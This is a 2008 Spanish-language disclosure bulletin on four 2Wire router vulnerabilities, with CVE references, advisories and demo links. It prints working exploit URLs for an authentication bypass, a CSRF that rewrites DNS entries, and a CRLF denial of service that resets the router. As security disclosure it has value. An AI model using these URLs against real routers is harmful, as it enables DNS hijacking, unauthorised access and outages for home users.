ÿþ % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% V U L N E R A B I L I D A D E S EN R U T E A D O R E S 2 W I R E %% %% Advisories, Demos & Exploits %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% [ Authentication Bypass ] %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% : Impacto: ALTO [‘%‘%’%’%“%“%ˆ%ˆ%] : % CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4388 % % Demo (CUIDADO Cambia tu password): http://2wire-poc.blogspot.com % % Exploit: % % % % http://gateway.2wire.net/xslt?PAGE=H04 % % %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% [ Cross Site Request Forgery ] %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% : Impacto: ALTO [‘%‘%’%’%“%“%ˆ%ˆ%] : % Autor: hkm % % Advisory: http://www.hakim.ws/textos/2wirexsrf.txt % % CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4387 % % Demo (agrega entrada dns): http://www.hakim.ws/2wire/demodns.html % % Exploit (dns): % % % % http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38 % % &NEXTPAGE=J38_SET&NAME=<DOMINIO>&ADDR=<IP> % % %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% [ CRLF Denial of Service ] %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% : Impacto: MEDIO [‘%‘%’%’%“%“% ] : % Autor: Preth00nker % % Advisory: http://www.hakim.ws/cum/index.php?topic=15162.msg86315#msg86315% % CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4523 % % Demo (resetea tu ruteador): http://www.hakim.ws/2wire/crlfdos.html % % Exploit (dns): % % % % http://gateway.2wire.net/xslt?PAGE=%0D&0A % % %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% [ Configuration Disclosure ] %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% : Impacto: MEDIO [‘%‘%’%’%“%“% ] : % Autor: Javier Liendo % % Advisory: (mirror) http://www.hakim.ws/2wire/urlmagico.txt % % Exploit reservado % % %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Estas vulnerabilidades estan presentes en routers "con firmware < 5.29.135.5" Nunca me he topado un solo ruteador que no sea vulnerable. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 28/03/2008@12:12pm Soporte Prodigy dice que no existe actualizacion. 28/03/2008@12:27pm 2wire confirma que el firwmare solo existe para 2701. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% hkm 28/03/2008 diseño © CraCkEr 2008